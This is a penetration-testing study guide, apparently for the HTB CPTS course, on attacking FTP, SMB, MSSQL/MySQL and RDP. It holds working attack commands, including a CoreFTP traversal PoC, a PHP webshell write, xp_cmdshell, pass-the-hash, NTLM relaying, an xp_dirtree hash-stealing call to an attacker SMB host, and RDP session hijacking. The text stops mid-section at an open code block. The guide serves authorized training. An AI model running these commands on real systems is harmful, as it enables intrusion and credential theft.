daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attacking-common-services-guide.md (45434B)


      1 ---
      2 title: "Attacking Common Services — Full Guide"
      3 description: "Detailed CPTS walkthrough for enumerating and exploiting the network services that dominate internal and perimeter networks: FTP, SMB, SQL (MySQL/MSSQL), RDP, DNS, and email (SMTP/POP3/IMAP) — anonymous access, default creds, spraying, misconfigurations, and the module's worked CVEs, framed by the Source → Process → Privileges → Destination model."
      4 category: pentest-workflow
      5 subcategory: "Companion Guides"
      6 order: 24
      7 tags: ["htb", "cpts", "attacking-common", "services", "ftp", "smb", "mssql", "mysql", "rdp", "dns", "smtp", "pop3", "imap", "responder", "pass-the-hash", "subdomain-takeover", "pentest-workflow"]
      8 tools: ["nmap", "smbclient / smbmap / rpcclient / enum4linux-ng", "netexec (nxc) / crackmapexec", "impacket (psexec/smbexec/atexec/ntlmrelayx/mssqlclient/smbserver)", "responder", "hashcat", "medusa / hydra / crowbar", "mysql / sqsh / sqlcmd", "xfreerdp / rdesktop", "dig / fierce / subfinder", "swaks / smtp-user-enum / o365spray", "ettercap / bettercap"]
      9 difficulty: intermediate
     10 updated: "2026-09-16"
     11 source: "vault:HackTheBox/Academy/CPTS Path/11-Attacking-Common-Services"
     12 ---
     13 
     14 [Workflow dashboard](/sheets/pentest-workflow/attack-flow-dashboard) · [Field manual](/sheets/pentest-workflow/network-service-attack-manual) · [Applications guide →](/sheets/pentest-workflow/attacking-common-applications-guide)
     15 
     16 # Attacking Common Services — Full Guide `fas:ClipboardList`
     17 
     18 > [!dashboard] What this is
     19 > The long-form companion to the Attacking Common Services cheat sheet. The cheat sheet is the card you keep open during a box; this guide is the walkthrough that explains *why* each step works, section by section, across the whole CPTS module. Reach for the cheat sheet mid-engagement and this guide when you're learning the material or writing it up. For the broader cross-module field reference (NFS, Kerberos, WinRM, SNMP, SSH, chaining, cleanup) see the [Network Service Attack Manual](/sheets/pentest-workflow/network-service-attack-manual).
     20 
     21 Common services are the plumbing every network runs on: a file share, a database, a mail server, a remote-desktop endpoint, a DNS resolver. They are rarely glamorous and almost never the thing a defender hardens first, which is exactly why they land footholds. A company patches its browsers and hardens its domain controllers, then leaves an FTP root that accepts `anonymous`, an MSSQL instance still running `xp_cmdshell` as a service account, or an SMB server that answers a null session and hands over its share list for free.
     22 
     23 Every service in this module answers to the same loop. Learn the loop rather than memorising six unrelated exploits:
     24 
     25 <figure class="flow plate corners">
     26   <figcaption class="flow__cap"><span class="flow__kind">Common-services attack loop</span><span class="flow__dir">TD</span></figcaption>
     27   <div class="flow__body">
     28     <div class="flow__diagram" data-dir="td">
     29       <div class="flow-rank"><div class="flow-node is-entry">Enumerate the service<span class="sub">nmap -sC -sV · banner · version</span></div></div>
     30       <div class="flow-edge"></div>
     31       <div class="flow-rank"><div class="flow-node">Try anonymous / null access<span class="sub">(free, non-destructive, first)</span></div></div>
     32       <div class="flow-edge"></div>
     33       <div class="flow-rank"><div class="flow-node">Default → weak credentials<span class="sub">admin:admin · root:&lt;blank&gt; · service defaults</span></div></div>
     34       <div class="flow-edge"></div>
     35       <div class="flow-rank"><div class="flow-node">Reuse everything found<span class="sub">a filename, a mailbox string, a config value</span><span class="sub">as a candidate cred on every other service</span></div></div>
     36       <div class="flow-edge"></div>
     37       <div class="flow-rank"><div class="flow-node">Spray (lockout-aware)<span class="sub">one password, many users, spaced</span></div></div>
     38       <div class="flow-edge"></div>
     39       <div class="flow-rank"><div class="flow-node is-decision">Turn access into code or creds</div></div>
     40       <div class="flow-branches">
     41         <div class="flow-lane"><div class="flow-edge"><span class="flow-edge__label">built-in feature</span></div><div class="flow-node">xp_cmdshell · WAR/webshell upload<span class="sub">SELECT ... INTO OUTFILE · tscon</span></div></div>
     42         <div class="flow-lane"><div class="flow-edge"><span class="flow-edge__label">version CVE</span></div><div class="flow-node">CoreFTP · SMBGhost · BlueKeep<span class="sub">OpenSMTPD · Drupalgeddon-class</span></div></div>
     43       </div>
     44       <div class="flow-join"></div>
     45       <div class="flow-rank"><div class="flow-node is-goal">Loot → feed credential hunting<span class="sub">and lateral movement</span></div></div>
     46     </div>
     47   </div>
     48 </figure>
     49 
     50 > [!danger]+ Authorized targets only
     51 > `fas:TriangleExclamation`
     52 > Everything here affects availability and integrity of real services. **Password spraying** can lock accounts, **NTLM relaying** authenticates as a real user, and the RCE CVEs are the sharp end — **BlueKeep can BSOD the host** and OpenSMTPD RCE runs as root. Run this only on engagements or labs where you hold explicit written permission, spray with the lockout policy in front of you, get sign-off before firing a memory-corruption exploit at anything a client cares about, and treat every recovered credential as sensitive evidence rather than something to paste into permanent notes.
     53 
     54 ---
     55 
     56 ## 1 · Interacting with common services `fas:Terminal`
     57 
     58 Before attacking a service you have to be fluent in using it normally, from both a Windows and a Linux vantage point. Most "attacks" in this module are abuse of the same legitimate interaction patterns shown here — recognising the normal shape of SMB, SQL, and mail traffic is what lets you spot the abnormal (and therefore interesting) later.
     59 
     60 > [!tip] Two shells on Windows
     61 > `cmd.exe` runs native Windows commands only. PowerShell runs those *and* cmdlets, and gives you a real scripting language (`Get-ChildItem`, `Select-String`, `New-PSDrive`, `PSCredential` objects). Default to PowerShell for anything past a one-off `dir`.
     62 
     63 **SMB from Windows.** Browse over a UNC path with no mapping, or map a drive with explicit creds and then treat it like local storage:
     64 
     65 ```cmd
     66 C:\htb> dir \\192.168.220.129\Finance\
     67 C:\htb> net use n: \\192.168.220.129\Finance /user:plaintext Password123
     68 C:\htb> dir n: /a-d /s /b | find /c ":\"      :: count files — gauge share size before searching
     69 C:\htb> dir n:\*cred* /s /b                    :: filename search
     70 C:\htb> findstr /s /i cred n:\*.*              :: content search — leaks different things
     71 ```
     72 
     73 **SMB from PowerShell.** Same idea, but composes into the pipeline. Build a `PSCredential` for non-interactive auth:
     74 
     75 ```powershell
     76 PS C:\htb> $password = ConvertTo-SecureString 'Password123' -AsPlainText -Force
     77 PS C:\htb> $cred = New-Object System.Management.Automation.PSCredential 'plaintext', $password
     78 PS C:\htb> New-PSDrive -Name N -Root "\\192.168.220.129\Finance" -PSProvider FileSystem -Credential $cred
     79 PS N:\> Get-ChildItem -Recurse -Path N:\ | Select-String "cred" -List   # PowerShell's grep
     80 ```
     81 
     82 **SMB from Linux.** Mount it and it's just a directory — no SMB-specific tooling needed afterwards. Prefer a credentials file so the password stays out of shell history and `ps`:
     83 
     84 ```bash
     85 sudo apt install cifs-utils
     86 sudo mount -t cifs //192.168.220.129/Finance /mnt/Finance -o credentials=/path/creds
     87 #   creds file:  username=plaintext / password=Password123 / domain=.
     88 grep -rn /mnt/Finance/ -ie cred
     89 ```
     90 
     91 **SQL clients.** Native CLIs plus one GUI worth keeping installed:
     92 
     93 ```bash
     94 sqsh -S 10.129.20.13 -U username -P Password123        # MSSQL from Linux (plaintext SQL auth only)
     95 mysql -u username -pPassword123 -h 10.129.20.13         # MySQL from Linux
     96 mssqlclient.py -p 1433 julio@10.129.203.7               # Impacket — supports NTLM hash / Kerberos
     97 dbeaver &                                               # free, cross-platform, multi-engine GUI
     98 ```
     99 
    100 ```cmd
    101 C:\htb> sqlcmd -S 10.129.20.13 -U username -P Password123   :: MSSQL from Windows
    102 ```
    103 
    104 > [!info] Command breakdown
    105 > - `sqsh`/`sqlcmd` are the native MSSQL CLIs; `mysql` is MySQL's. `mssqlclient.py` (Impacket) is the one to reach for when you hold an NTLM **hash** rather than a plaintext password — `sqsh`/`sqlcmd` can't do hash or Kerberos auth.
    106 > - `dbeaver` speaks MySQL, MSSQL, PostgreSQL and more from one UI — the practical cross-platform substitute for SSMS (Windows-only) or MySQL Workbench.
    107 
    108 **Mail clients.** Once you hold valid mailbox creds, a real client beats raw protocol commands for reading a mailbox:
    109 
    110 ```bash
    111 sudo apt-get install evolution
    112 export WEBKIT_FORCE_SANDBOX=0 && evolution   # if it dies with a bwrap sandbox error
    113 ```
    114 
    115 > [!tip] Current tooling
    116 > For SMB enumeration prefer **`enum4linux-ng`** (maintained Python rewrite) over the effectively-unmaintained Perl `enum4linux`. Impacket is under active Fortra maintenance and is the de-facto standard for scripted SMB/MSSQL interaction.
    117 
    118 ---
    119 
    120 ## 2 · The concept of attacks
    121 
    122 Rather than memorising per-protocol exploits in isolation, decompose any vulnerability into four categories. The same cycle reappears for CoreFTP, SMBGhost, BlueKeep, subdomain takeover, and the OpenSMTPD RCE — once you can place a technique in this frame, spotting the analogue on a service you've never touched gets much faster.
    123 
    124 <figure class="flow plate corners">
    125   <figcaption class="flow__cap"><span class="flow__kind">Source → Process → Privileges → Destination</span><span class="flow__dir">LR</span></figcaption>
    126   <div class="flow__body">
    127     <div class="flow__diagram" data-dir="lr">
    128       <div class="flow-rank"><div class="flow-node is-entry">Source<span class="sub">code · libraries · config</span><span class="sub">APIs · user input</span></div></div>
    129       <div class="flow-edge"></div>
    130       <div class="flow-rank"><div class="flow-node">Process<span class="sub">the logic handling it</span><span class="sub">— most vulns live here</span></div></div>
    131       <div class="flow-edge"></div>
    132       <div class="flow-rank"><div class="flow-node">Privileges<span class="sub">SYSTEM/root · service acct · role</span><span class="sub">= blast radius</span></div></div>
    133       <div class="flow-edge"></div>
    134       <div class="flow-rank"><div class="flow-node is-goal">Destination<span class="sub">local (file/service)</span><span class="sub">or network (another host)</span></div></div>
    135     </div>
    136   </div>
    137 </figure>
    138 
    139 > [!info] The four categories
    140 > - **Source** — where the triggering input originates: already-executed code, a library, static config, an API, or direct user input. Protocol is irrelevant here; an HTTP header injection and a buffer overflow both reduce to "code" as the source.
    141 > - **Process** — how program logic handles that input. Most real vulnerabilities live here, because it's where a developer's assumptions about input turn out to be wrong.
    142 > - **Privileges** — the rights the process runs with. This sets the blast radius, not the exploitability: a simple bug in a process running as SYSTEM/root is disproportionately dangerous.
    143 > - **Destination** — where the result lands: a local file/service, or another host over the network. The cycle is deliberately linear; a full chain is usually an *initiation* cycle (get a foothold / leak something) plus a *trigger* cycle (turn it into RCE).
    144 
    145 **Worked example — Log4j (CVE-2021-44228).** A crafted JNDI string in the HTTP `User-Agent` header (Source) is misparsed by the logging function instead of being logged as text (Process); logging typically runs with elevated rights (Privileges); the JNDI lookup reaches out to attacker infrastructure hosting a malicious Java class (Destination). A second cycle then pulls that class back (Source), executes it (Process), inherits the same rights (Privileges), and opens a shell back to the attacker (Destination). Two four-step cycles chained — initiation, then trigger — which is the shape of nearly every exploit chain later in this module.
    146 
    147 ---
    148 
    149 ## 3 · Service misconfigurations `fas:Terminal`
    150 
    151 Misconfigurations, not zero-days, are the everyday bread and butter of internal tests. Four categories recur across almost every service here:
    152 
    153 1. **Weak / default authentication** — `admin:admin`, `admin:password`, blank passwords left after install, or a weak password set "to change later."
    154 2. **Anonymous authentication** — access with no credentials at all. Common on FTP and SMB, occasionally on SQL.
    155 3. **Misconfigured access rights** — accounts with permissions beyond their role (an upload-only FTP account that can also read every document). Subtle, because the credentials are "correct" but the account is over-privileged.
    156 4. **Unnecessary defaults** — sample files, admin/debug interfaces, verbose errors left enabled because they ship on by default.
    157 
    158 > [!tip] The order to test in
    159 > After a banner grab, check **default credentials before anything sophisticated** — cheap to try, disproportionately effective. If defaults fail, run the common weak combos (`admin:<blank>`, `root:12345678`, `administrator:Password`) before you reach for a full spray, and a spray before brute force.
    160 
    161 OWASP's **A05:2021 – Security Misconfiguration** doubles as an offensive checklist and ready-made remediation language for the report: disable unneeded admin interfaces, turn off debug/stack traces in production, change default creds immediately, block directory listing and info disclosure, scan on a schedule, automate identical hardening across environments (different creds per environment), and strip unused features/sample apps.
    162 
    163 ---
    164 
    165 ## 4 · Finding sensitive information
    166 
    167 Attacking common services is detective work: a single, apparently insignificant thing found on one service is frequently the key to a completely different one. The canonical worked chain from the module makes the point — an *empty file* is the whole foothold:
    168 
    169 <figure class="flow plate corners">
    170   <figcaption class="flow__cap"><span class="flow__kind">One empty filename → RCE on a different box</span><span class="flow__dir">LR</span></figcaption>
    171   <div class="flow__body">
    172     <div class="flow__diagram" data-dir="lr">
    173       <div class="flow-rank"><div class="flow-node is-entry">Anonymous FTP<span class="sub">finds empty file 'johnsmith'</span></div></div>
    174       <div class="flow-edge"></div>
    175       <div class="flow-rank"><div class="flow-node">johnsmith:johnsmith<span class="sub">on FTP → fails</span></div></div>
    176       <div class="flow-edge"></div>
    177       <div class="flow-rank"><div class="flow-node">Same creds on email<span class="sub">→ succeeds</span></div></div>
    178       <div class="flow-edge"></div>
    179       <div class="flow-rank"><div class="flow-node">Search mailbox for 'password'<span class="sub">→ finds MSSQL creds</span></div></div>
    180       <div class="flow-edge"></div>
    181       <div class="flow-rank"><div class="flow-node is-goal">MSSQL → xp_cmdshell<span class="sub">→ RCE on the DB server</span></div></div>
    182     </div>
    183   </div>
    184 </figure>
    185 
    186 The operationally useful takeaway is the *sequencing*: try anonymous access broadly across every discovered service first (cheap, fast, non-destructive), then use anything found — even an empty file's name — as a candidate username or password against every other service, before falling back to brute force or exploitation. Searching any mailbox you get into for the literal string `password` is a surprisingly high-yield move. Tag credential candidates somewhere you can cross-reference them (Obsidian, Ghostwriter, Dradis) so a pivot doesn't get lost in terminal scrollback.
    187 
    188 ---
    189 
    190 ## 5 · Attacking FTP `fas:Terminal` — TCP/21
    191 
    192 FTP is a plaintext file-transfer protocol. Two misconfigurations dominate (anonymous auth, over-permissive access rights), and a modern CVE shows even a maintained product can carry a trivial arbitrary-write bug.
    193 
    194 **Enumerate.** `-sC` runs `ftp-anon`, which both tests anonymous login and lists directory contents inline:
    195 
    196 ```bash
    197 sudo nmap -sC -sV -p 21 192.168.2.142
    198 #  | ftp-anon: Anonymous FTP login allowed (FTP code 230)
    199 #  | drwxr-srwt   2 1170  924  2048 Jul 19 18:48 incoming [NSE: writeable]
    200 #  221/tcp banner e.g. vsFTPd 2.3.4  → note the exact version for CVE lookup
    201 ```
    202 
    203 The `[NSE: writeable]` tag flags a directory the anonymous session can write to — a direct route to webshell upload if that same FTP root is served over HTTP elsewhere on the host.
    204 
    205 **Anonymous login and file ops.** Try `anonymous` with a blank/arbitrary password even without a prior `ftp-anon` hit — the script occasionally misses custom configs:
    206 
    207 ```bash
    208 ftp 192.168.2.142      # Name: anonymous · Password: <blank>
    209 ftp> ls                # navigate like Linux: ls / cd
    210 ftp> get flag.txt      # get/mget download · put/mput upload · help lists client commands
    211 ```
    212 
    213 **Brute force / spray.** `-u` a single known user, `-U` a list; spraying (one password, many users) is the safer default where lockout thresholds are unknown:
    214 
    215 ```bash
    216 medusa -u fiona -P /usr/share/wordlists/rockyou.txt -h 10.129.203.7 -M ftp
    217 #  ACCOUNT FOUND: [ftp] User: fiona  Password: family [SUCCESS]
    218 hydra -L users.txt -P rockyou.txt ftp://10.129.203.7      # often faster (better connection reuse)
    219 ```
    220 
    221 **FTP bounce.** The `PORT` command can make an internet-facing FTP server proxy a scan to a third, internal host you can't reach directly — turning it into a blind port scanner. Modern daemons block this by default, so a positive result is itself a reportable misconfiguration:
    222 
    223 ```bash
    224 nmap -Pn -v -n -p80 -b anonymous:password@172.17.0.2 172.17.0.2
    225 #  Login credentials accepted by FTP server! → 80/tcp open http (scanned via the proxy)
    226 ```
    227 
    228 **CoreFTP arbitrary file write (CVE-2022-22836).** The HTTP `PUT` handler fails to normalise `../`, so an authenticated `curl` writes a file anywhere the service account can:
    229 
    230 ```bash
    231 curl -k -X PUT -H "Host: <IP>" --basic -u <user>:<pass> \
    232      --data-binary "PoC." --path-as-is https://<IP>/../../../../../../whoops
    233 #  C:\> type C:\whoops  →  PoC.
    234 ```
    235 
    236 Mapped to the model: user-controlled path + escape chars (Source) → the traversal check validated only the *starting* directory, not the resolved path (Process/Privileges) → arbitrary file on disk (Destination). `--path-as-is` stops curl from collapsing the `../` before it's sent.
    237 
    238 ---
    239 
    240 ## 6 · Attacking SMB `fas:Terminal` — TCP/445, 139
    241 
    242 SMB (Server Message Block) is the largest attack surface in the module: file/printer/named-pipe sharing over TCP/445 (or 139 with legacy NetBIOS), with Samba as the Linux implementation. The path runs from unauthenticated enumeration all the way to a SYSTEM shell.
    243 
    244 <figure class="flow plate corners">
    245   <figcaption class="flow__cap"><span class="flow__kind">SMB: null session to SYSTEM</span><span class="flow__dir">TD</span></figcaption>
    246   <div class="flow__body">
    247     <div class="flow__diagram" data-dir="td">
    248       <div class="flow-rank"><div class="flow-node is-entry">nmap -p139,445 -sC -sV<span class="sub">check smb2-security-mode (signing)</span></div></div>
    249       <div class="flow-edge"></div>
    250       <div class="flow-rank"><div class="flow-node is-decision">Null session allowed?</div></div>
    251       <div class="flow-branches">
    252         <div class="flow-lane"><div class="flow-edge"><span class="flow-edge__label">yes</span></div><div class="flow-node">smbclient / smbmap / rpcclient -N<span class="sub">shares · users · groups · policy</span></div></div>
    253         <div class="flow-lane"><div class="flow-edge"><span class="flow-edge__label">no</span></div><div class="flow-node">Password spray<span class="sub">nxc / crackmapexec</span></div></div>
    254       </div>
    255       <div class="flow-join"></div>
    256       <div class="flow-rank"><div class="flow-node">Valid admin-equivalent creds or hash</div></div>
    257       <div class="flow-edge"></div>
    258       <div class="flow-rank"><div class="flow-node is-goal">RCE (psexec/smbexec/atexec) · --sam dump · Pass-the-Hash<span class="sub">→ SYSTEM</span></div></div>
    259     </div>
    260   </div>
    261 </figure>
    262 
    263 **Enumerate.** `-sV -sC` reveal the implementation, version, NetBIOS name, and — critically — whether message signing is enforced:
    264 
    265 ```bash
    266 sudo nmap 10.129.14.128 -sV -sC -p139,445
    267 #  445/tcp open  netbios-ssn  Samba smbd 4.6.2          (Samba ⇒ Linux target)
    268 #  smb2-security-mode:  Message signing enabled but not required   ← relaying is possible
    269 ```
    270 
    271 Signing *not required* is a prerequisite for the NTLM relay in step 8 — always note it during initial enumeration.
    272 
    273 **Null session share / RPC enumeration.** A null session is an SMB connection with no username or password; if it works, treat it as equivalent to low-priv creds for enumeration:
    274 
    275 ```bash
    276 smbclient -N -L //10.129.14.128        # list shares (ADMIN$, C$, custom shares, IPC$)
    277 smbmap -H 10.129.14.128                 # same, but with per-share R/W permission columns
    278 smbmap -H 10.129.14.128 --download "notes\note.txt"   # transfer without an interactive session
    279 rpcclient -U'%' 10.10.110.17            # null session RPC shell
    280 rpcclient $> enumdomusers               #   user:[mhope] rid:[0x641] ...
    281 ./enum4linux-ng.py 10.10.11.45 -A -C    # one-pass domain/users/groups/shares/policy
    282 ```
    283 
    284 **Spray.** One password across a user list avoids the lockout risk of many-passwords-per-account; `--local-auth` targets non-domain accounts; `(Pwn3d!)` marks confirmed local admin:
    285 
    286 ```bash
    287 nxc smb 10.10.110.17 -u /tmp/userlist.txt -p 'Company01!' --local-auth
    288 #  [+] WIN7BOX\jurena:Company01! (Pwn3d!)
    289 #  --continue-on-success  keeps going past the first hit
    290 ```
    291 
    292 > [!tip] CrackMapExec → NetExec
    293 > **NetExec (`nxc`)** is the actively developed successor to CrackMapExec — same syntax family, more protocol modules. Every `crackmapexec smb ...` in older writeups maps 1:1 to `nxc smb ...`. Examples below use `nxc`; the classic `crackmapexec` name still works where CME is installed.
    294 
    295 **Remote code execution.** With admin-equivalent creds, three Impacket methods, each landing a SYSTEM shell by a different mechanism:
    296 
    297 ```bash
    298 impacket-psexec administrator:'Password123!'@10.10.110.17    # uploads a service to ADMIN$, runs via SCM
    299 #  C:\Windows\system32> whoami  →  nt authority\system
    300 nxc smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec
    301 ```
    302 
    303 `impacket-smbexec` avoids RemComSvc and works without a writable share (it stands up a local SMB server for output); `impacket-atexec` runs through Task Scheduler instead of the SCM — useful when service creation is blocked or heavily logged.
    304 
    305 **Dump SAM hashes.** Sweep a subnet for who's logged on, then dump the local NTLM hashes:
    306 
    307 ```bash
    308 nxc smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users   # find where a DA is sitting
    309 nxc smb 10.10.110.17   -u administrator -p 'Password123!' --sam
    310 #  Administrator:500:aad3b435...:2b576acbe6bcfda7294d6bd18041b8fe:::
    311 ```
    312 
    313 **Pass-the-Hash.** Windows challenge-response only needs the hash, never the plaintext — so a dumped or captured NTLM hash is immediately usable for lateral movement. PtH is a property of NTLM auth, not a tool feature; it works identically with Impacket, smbmap, and nxc:
    314 
    315 ```bash
    316 nxc smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE
    317 #  [+] WIN7BOX\Administrator:2B57... (Pwn3d!)
    318 ```
    319 
    320 **Forced authentication + relay (Responder / ntlmrelayx).** Responder answers LLMNR/NBT-NS/mDNS broadcasts (which fire whenever a client mistypes a hostname or DNS fails) *as* the server the victim wanted, capturing a NetNTLMv2 hash. Crack it, or relay it live:
    321 
    322 ```bash
    323 sudo responder -I ens33
    324 #  [SMB] NTLMv2-SSP Hash : demouser::WIN7BOX:997b18cc61099ba2:...
    325 hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt      # 5600 = NetNTLMv2
    326 
    327 # If cracking fails, relay instead. Turn off Responder's own SMB server first (SMB = Off):
    328 impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146
    329 #  add  -c '<cmd>'  to run a command on the relay target instead of the default SAM dump
    330 ```
    331 
    332 Relaying only works where SMB signing is *not enforced* — the check you made during enumeration. This is the same Source→Process→Privileges→Destination cycle as the SQL `xp_dirtree` hash steal in the next section, just triggered by a broadcast name-resolution mistake instead of a SQL stored procedure.
    333 
    334 **SMBGhost (CVE-2020-0796)** — concept only. An integer overflow in SMBv3.1.1 compression negotiation on Windows 10 1903/1909: an oversized compressed message overflows a size-check integer, writing past the buffer and overwriting adjacent instructions, which the attacker shapes to redirect execution. Kernel-level exploit development, outside this module's scope, but a clean example of the model at the memory-corruption layer.
    335 
    336 ---
    337 
    338 ## 7 · Attacking SQL databases `fas:Terminal` — MSSQL 1433 · MySQL 3306
    339 
    340 Databases store credentials, PII, and business data, and often run with excessive service-account privileges — high value on both counts. MSSQL and MySQL both speak SQL/T-SQL once you're in.
    341 
    342 <figure class="flow plate corners">
    343   <figcaption class="flow__cap"><span class="flow__kind">SQL access to OS command execution</span><span class="flow__dir">TD</span></figcaption>
    344   <div class="flow__body">
    345     <div class="flow__diagram" data-dir="td">
    346       <div class="flow-rank"><div class="flow-node is-entry">Authenticate<span class="sub">mysql · sqsh · sqlcmd · mssqlclient.py</span></div></div>
    347       <div class="flow-edge"></div>
    348       <div class="flow-rank"><div class="flow-node is-decision">Privilege held?</div></div>
    349       <div class="flow-branches">
    350         <div class="flow-lane"><div class="flow-edge"><span class="flow-edge__label">MSSQL sysadmin</span></div><div class="flow-node">xp_cmdshell → RCE</div></div>
    351         <div class="flow-lane"><div class="flow-edge"><span class="flow-edge__label">MySQL FILE</span></div><div class="flow-node">SELECT ... INTO OUTFILE → webshell</div></div>
    352         <div class="flow-lane"><div class="flow-edge"><span class="flow-edge__label">IMPERSONATE granted</span></div><div class="flow-node">EXECUTE AS LOGIN='sa'<span class="sub">→ effective sysadmin</span></div></div>
    353       </div>
    354       <div class="flow-join"></div>
    355       <div class="flow-rank"><div class="flow-node is-goal">OS command execution as the SQL service account<span class="sub">or pivot via linked server</span></div></div>
    356     </div>
    357   </div>
    358 </figure>
    359 
    360 > [!info] MSSQL auth modes
    361 > **Windows auth** (default) ties SQL Server to Windows/AD — already-authenticated users need no further creds. **Mixed mode** additionally allows SQL-native username/password accounts. Specifying a domain/hostname on connect selects Windows auth; omitting it assumes SQL auth. In `sqsh`, a leading `.\` (`.\\julio`) explicitly forces a *local* SQL account.
    362 
    363 **Enumerate.** MSSQL defaults to TCP/1433 (a "hidden" instance can sit on 2433); MySQL to TCP/3306. Nmap's `ms-sql-*` scripts leak version, hostname, and domain with no auth:
    364 
    365 ```bash
    366 nmap -Pn -sV -sC -p1433,3306 10.10.10.125
    367 #  1433/tcp ms-sql-s  Microsoft SQL Server 2017 ...  DNS_Computer_Name: mssql-test.HTB.LOCAL
    368 ```
    369 
    370 **Connect and enumerate data.** Every batch in `sqsh`/`sqlcmd` needs `GO` on its own line:
    371 
    372 ```sql
    373 -- MySQL
    374 SHOW DATABASES; USE htbusers; SHOW TABLES; SELECT * FROM users;
    375 -- MSSQL (sqsh/sqlcmd)
    376 SELECT name FROM master.dbo.sysdatabases
    377 GO
    378 SELECT table_name FROM htbusers.INFORMATION_SCHEMA.TABLES
    379 GO
    380 ```
    381 
    382 Ignore the system DBs when hunting data — MySQL `mysql`/`information_schema`/`performance_schema`/`sys`, MSSQL `master`/`msdb`/`model`/`resource`/`tempdb` — they fingerprint the engine but hold no company data.
    383 
    384 **Command execution — xp_cmdshell (MSSQL).** An extended stored procedure that spawns a Windows process as the SQL service account. Disabled by default, re-enabled trivially with sysadmin:
    385 
    386 ```sql
    387 xp_cmdshell 'whoami'
    388 GO
    389 --  no service\mssql$sqlexpress
    390 -- if disabled:
    391 EXECUTE sp_configure 'show advanced options', 1; RECONFIGURE;
    392 EXECUTE sp_configure 'xp_cmdshell', 1; RECONFIGURE;
    393 GO
    394 ```
    395 
    396 It runs **synchronously** — control returns only when the command finishes, worth remembering for long-running payloads. MySQL has no direct equivalent but supports UDFs that can run C/C++; rare in production, worth checking.
    397 
    398 **Read / write local files.** Note the asymmetric MSSQL defaults — reads work out of the box, writes need Ole Automation enabled first:
    399 
    400 ```sql
    401 -- MySQL (needs FILE priv + empty secure_file_priv; check SHOW VARIABLES LIKE 'secure_file_priv')
    402 SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';
    403 SELECT LOAD_FILE("/etc/passwd");
    404 -- MSSQL read (no special config)
    405 SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS x
    406 GO
    407 ```
    408 
    409 Writing a PHP one-liner straight into the web root turns a file-write primitive into RCE if the box also serves web content.
    410 
    411 **Privilege escalation via IMPERSONATE.** A self-contained privesc *inside* SQL Server — worth checking on every MSSQL foothold, even without OS access. Find who you can impersonate, then become them (no password needed):
    412 
    413 ```sql
    414 SELECT DISTINCT b.name FROM sys.server_permissions a
    415   INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id
    416   WHERE a.permission_name = 'IMPERSONATE'
    417 GO                                    --  name: sa
    418 EXECUTE AS LOGIN = 'sa'
    419 SELECT SYSTEM_USER
    420 SELECT IS_SRVROLEMEMBER('sysadmin')   --  1  ⇒ full sysadmin; xp_cmdshell now available
    421 GO                                    --  REVERT switches back
    422 ```
    423 
    424 **Linked-server pivoting.** Pass-through T-SQL to a second SQL instance; if the linked server's stored creds have sysadmin, you own that box too. Double single quotes inside the query to escape:
    425 
    426 ```sql
    427 SELECT srvname, isremote FROM sysservers
    428 GO
    429 EXECUTE('select @@servername, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\SQLEXPRESS]
    430 GO
    431 ```
    432 
    433 **Steal the service-account hash (xp_dirtree / xp_subdirs).** These procedures reach a path over SMB — point them at your box and the MSSQL service account authenticates to you:
    434 
    435 ```bash
    436 sudo impacket-smbserver share ./ -smb2support     # or: sudo responder -I tun0
    437 ```
    438 ```sql
    439 EXEC master..xp_dirtree '\\10.10.110.17\share\'
    440 GO
    441 --  [SMB] NTLMv2-SSP Hash : SRVMSSQL\demouser::WIN7BOX:5e3ab1c4380b94a1:...
    442 ```
    443 
    444 `xp_subdirs` sometimes errors with access-denied even though the authentication (and hash capture) still completes — a stored-procedure error is not proof the technique failed. Same forced-auth cycle as SMB Responder, triggered from inside SQL.
    445 
    446 ---
    447 
    448 ## 8 · Attacking RDP `fas:Terminal` — TCP/3389
    449 
    450 RDP is Microsoft's graphical remote-admin protocol, heavily used by sysadmins and MSPs — a prime target. Account lockout policies apply, so spray, don't brute force.
    451 
    452 **Enumerate.** `ms-wbt-server` confirms RDP; `rdp-ntlm-info`/`rdp-enum-encryption` add domain/cipher fingerprinting:
    453 
    454 ```bash
    455 nmap -Pn -p3389 --script rdp-ntlm-info 192.168.2.143
    456 #  3389/tcp open  ms-wbt-server
    457 ```
    458 
    459 **Spray.** Crowbar is purpose-built for RDP/VNC; Hydra's `rdp` module is flagged experimental upstream — reduce parallelism and add wait time:
    460 
    461 ```bash
    462 crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
    463 #  RDP-SUCCESS : 192.168.220.142:3389 - administrator:password123
    464 hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp -t 1 -W 3
    465 ```
    466 
    467 **Log in.** `xfreerdp` is the maintained client of choice (dynamic resolution, clipboard, drive redirection, Pass-the-Hash) over the stagnant `rdesktop`:
    468 
    469 ```bash
    470 xfreerdp /v:<target> /u:<user> /p:'<password>'      # accept the self-signed cert warning
    471 ```
    472 
    473 **Session hijacking (local admin → SYSTEM → hijack).** `tscon.exe` reconnects another user's session by ID with no password — but only from a SYSTEM context. Services run as `Local System`, so create one whose binpath is the `tscon` call:
    474 
    475 ```cmd
    476 C:\htb> query user
    477 #   juurena  rdp-tcp#13  1  Active   ·   lewen  rdp-tcp#14  2  Active
    478 C:\htb> sc.exe create sessionhijack binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#13"
    479 C:\htb> net start sessionhijack        :: reconnects you to lewen's (id 2) session
    480 ```
    481 
    482 Confirmed **broken on Server 2019+** — Microsoft restricted the technique; check the target build first.
    483 
    484 **Pass-the-Hash via Restricted Admin Mode.** Disabled by default; enabling it needs prior local admin. Then `xfreerdp /pth:` authenticates with the raw NTLM hash — the RDP equivalent of SMB PtH:
    485 
    486 ```cmd
